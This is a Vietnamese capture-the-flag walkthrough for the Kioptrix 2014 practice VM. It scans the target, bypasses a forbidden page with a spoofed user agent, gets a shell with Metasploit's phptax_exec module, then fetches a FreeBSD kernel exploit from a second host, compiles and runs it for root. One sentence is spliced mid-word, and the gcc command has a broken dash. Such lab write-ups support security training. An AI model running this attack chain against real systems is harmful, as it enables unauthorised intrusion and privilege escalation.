Xin chào các bạn! Hôm nay chúng ta sẽ thực hiện một thử thách CTF khác có tên là Kioptrix: 2014 (#5) và đó là một thử thách boot2root khác được cung cấp để thực hành và mức độ bảo mật của nó dành cho người mới bắt đầu. Vì vậy, hãy cố gắng vượt qua nó. Nhưng trước đó xin lưu ý rằng bạn có thể tải xuống từ đây https://www.vulnhub.com/entry/kioptrix-2014-5,62/

Penetrating Method
- Network Scanning (Nmap, netdiscover)
- Surfing HTTP service ports (80 and 8080)
- Identifying exploit for the vulnerable Web application
- Exploiting the target via Metasploit
- Get Root access and capture the flag.o, chúng tôi khuyên bạn nên tháo card mạng và lắp lại . Vì một số lý do kỳ quặc, nó không nhận được IP của nó. Vì vậy, chỉ cần thêm VM vào phần mềm ảo hóa của bạn, xóa rồi thêm card mạng.
Hãy tấn công !
Bắt đầu với việc tìm mục tiêu bằng cách sử dụng:
netdiscover

Mục tiêu của chúng tôi là 192.168.1.159 Bây giờ hãy quét mục tiêu bằng nmap:
nmap -A 192.168.1.159

Với kết quả quét nmap, bạn có thể thấy dịch vụ HTTP đang chạy trên hai cổng là cổng 80, 8080
Khi có dịch vụ HTTP đang chạy, mở nó trong trình duyệt của mình bằng IP http://192.168.1.159. Không có gì đáng kể trên trang web, ngoại trừ nó nói “nó hoạt động!”. Tôi đã thử tìm kiếm bên trong mã nguồn, hy vọng tìm thấy thứ gì đó hữu ích, tuy nhiên, không có thông tin gì.

Sau đó, tôi nhớ rằng dịch vụ HTTP cũng đang lắng nghe trên cổng 8080. Vì vậy, tôi đã mở IP trên cổng 8080.

Nhưng quyền truy cập đã bị cấm; tuy nhiên, thông báo dường như không phải là thông báo lỗi đối với tôi. Có vẻ như đó là một thông điệp với phản hồi được tạo ra có chủ ý và có chủ ý. Tôi đã thử mọi phương pháp để vượt qua quyền truy cập bị cấm này nhưng không có gì hiệu quả. Do đó, tôi quyết định sử dụng trình User Agent Switcher để kiểm tra trang này trong các trình duyệt phổ biến khác như Internet Explorer.
Tải xuống plugin User Agent Switcher trong Mozilla và thực hiện các thao tác sau
Điều hướng đến menu Công cụ từ thanh menu . Một trình đơn thả xuống sẽ xuất hiện. Từ menu này, chọn User Agent Switcher . Một menu khác sẽ mở ra và từ menu này chọn Internet Explorer , từ menu này, một menu khác sẽ mở ra và từ đó chọn Internet Explorer 6 .

Và may mắn thay, chúng tôi đã truy cập được vào trang. Và tìm thấy một tệp có tên phptax/

Bây giờ hãy mở liên kết này và bạn sẽ có trang sau:

Trang này là của phptax. Phptax là một loại CMS dành cho hệ điều hành Linux. Mục đích của nó là phát triển một chương trình thuế sử dụng phương pháp không có cơ sở dữ liệu phù hợp với các tệp văn bản một dòng. Việc sử dụng phptax không yêu cầu cơ sở dữ liệu SQL thường được sử dụng trong chương trình này. Và may mắn thay, tồn tại một lỗ hổng khai thác phptax trong Metasploit, vì cách đó chỉ cần nhập tìm kiếm phptax trong Bảng điều khiển Metasploit MSF.
Để sử dụng khai thác này, chỉ cần nhập thông tin sau vào Metasploit:
msf > use exploit/multi/http/phptax_exec
msf exploit(phptax_exec) > set rhost 192.168.1.159
msf exploit(phptax_exec) > set rport 8080
msf exploit(phptax_exec) > exploit
Tuyệt vời!! Chúng tôi nhận được lệnh shell session 1 của máy nạn nhân.

Có một khai thác cho phiên bản hạt nhân này trong exploit-db.com. Ngoài ra, chúng ta cũng có thể tìm kiếm với sự trợ giúp của lệnh searchsploit FreeBSD 9.0 trong Kali Linux như hình bên dưới.

Sao chép khai thác từ vị trí mặc định của nó vào Desktop:
cp /usr/share/exploitdb/exploits/freebsd/local/28718.c .

Ở đây, tôi đã sử dụng lệnh tìm nạp vì lệnh wget không hoạt động. Vì vậy, sử dụng fetch thay thế cho lệnh wget và vì vậy chúng tôi đang trực tiếp sử dụng nó từ trình duyệt. Chúng tôi biên dịch tệp, lưu tệp dưới dạng kernel và cung cấp quyền thực thi.
fetch http://192.168.1.108/28718.c
gcc –o kernel 28718.c
chmod 777 kernel
Sau đó gõ lệnh sau để thực hiện khai thác:
./kernel
Khi khai thác thực thi, bạn sẽ đạt được gốc. Và để xác nhận loại này:
id

Sau đó di chuyển về thư mục gốc bằng cách gõ:
cd /root
Hãy xem nó có những thư mục nào :
ls
Ở đây chúng ta có một tệp văn bản có tên congrats.txt và tôi hy vọng đây sẽ là cờ của mình và để đọc nó, hãy gõ:
cat congrats.txt

Tác giả: Ankur Sachdev
